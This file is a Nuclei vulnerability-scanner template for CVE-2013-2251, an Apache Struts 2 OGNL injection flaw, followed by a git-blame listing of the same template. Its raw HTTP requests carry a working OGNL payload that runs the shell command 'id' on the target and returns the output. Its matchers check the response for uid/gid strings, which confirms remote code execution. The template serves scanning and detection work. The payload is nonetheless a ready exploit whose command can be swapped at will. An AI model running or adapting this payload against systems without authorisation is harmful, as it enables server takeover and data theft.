nuclei-templates/cves/2013/CVE-2013-2251.yaml

id: CVE-2013-2251

info:
  name: Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution
  author: exploitation & @dwisiswant0
  severity: critical
  description: In Struts 2 before 2.3.15.1 the information following "action:", "redirect:" or "redirectAction:" is not properly sanitized. Since said information will be evaluated as OGNL expression against the value stack, this introduces the possibility to inject server side code.
  tags: cve,cve2013,rce

requests:
  - payloads:
      params:
        - "redirect"
        - "action"
        - "redirectAction"
    raw:
      - |
        GET /index.action?§params§:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1
        Host: {{Hostname}}
        Connection: close
        Accept: */*
        Accept-Language: en

      - |
        GET /login.action?§params§:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1
        Host: {{Hostname}}
        Connection: close
        Accept: */*
        Accept-Language: en

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
          - 400
        condition: or
      - type: regex
        regex:
          - "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"
      - type: word
        words:
          - "There is no Action mapped for namespace"
          - "The origin server did not find a current representation for the target resource"
          - "Apache Tomcat"
        condition: or
        part: body
cve id updates 2021-01-02 05:02:50 +00:00			`id: CVE-2013-2251`
add cve-2013-2251 2020-10-13 22:06:01 +00:00
			`info:`
			`name: Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution`
:hammer: Fix false-positive for CVE-2013-2251 2020-11-25 00:26:52 +00:00			`author: exploitation & @dwisiswant0`
add cve-2013-2251 2020-10-13 22:06:01 +00:00			`severity: critical`
			`description: In Struts 2 before 2.3.15.1 the information following "action:", "redirect:" or "redirectAction:" is not properly sanitized. Since said information will be evaluated as OGNL expression against the value stack, this introduces the possibility to inject server side code.`
Added tags to cves :sunglasses: (#813) * Added tags to cves :sunglasses: 2021-02-05 19:44:41 +00:00			`tags: cve,cve2013,rce`
add cve-2013-2251 2020-10-13 22:06:01 +00:00
			`requests:`
:hammer: Fix false-positive for CVE-2013-2251 2020-11-25 00:26:52 +00:00			`- payloads:`
			`params:`
			`- "redirect"`
			`- "action"`
			`- "redirectAction"`
			`raw:`
			`- \|`
			`GET /index.action?§params§:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1`
			`Host: {{Hostname}}`
			`Connection: close`
			`Accept: /`
			`Accept-Language: en`

			`- \|`
			`GET /login.action?§params§:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1`
			`Host: {{Hostname}}`
			`Connection: close`
			`Accept: /`
			`Accept-Language: en`

add cve-2013-2251 2020-10-13 22:06:01 +00:00			`matchers-condition: and`
			`matchers:`
			`- type: status`
			`status:`
			`- 200`
:hammer: Fix false-positive for CVE-2013-2251 2020-11-25 00:26:52 +00:00			`- 400`
			`condition: or`
			`- type: regex`
			`regex:`
			`- "((u\|g)id\|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"`
add cve-2013-2251 2020-10-13 22:06:01 +00:00			`- type: word`
			`words:`
:hammer: Fix false-positive for CVE-2013-2251 2020-11-25 00:26:52 +00:00			`- "There is no Action mapped for namespace"`
			`- "The origin server did not find a current representation for the target resource"`
			`- "Apache Tomcat"`
			`condition: or`
add cve-2013-2251 2020-10-13 22:06:01 +00:00			`part: body`